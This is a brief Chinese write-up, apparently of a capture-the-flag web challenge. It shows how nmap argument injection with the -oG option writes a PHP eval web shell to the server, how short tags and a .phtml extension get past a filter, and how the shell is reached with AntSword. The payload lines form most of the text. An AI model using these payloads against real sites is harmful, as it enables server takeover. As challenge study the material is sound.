我随便输了个127.0.0.1
还有list.php 好像没什么用
昨天刚用了nmap的-oG参数
nmap常用命令
nmap详细使用教程_nmap使用教程-CSDN博客
试一下
' <?php @eval($_POST["a"]);?> -oG a.php '回显
测试发现php被过滤了
文件的内容<?php中的PHP如何替换上网去查了一下,解决方法是使用短标签<?
' <? @eval($_POST["pwd"]);?> -oG 1.phtml '
上传成功了
使用蚁剑连接
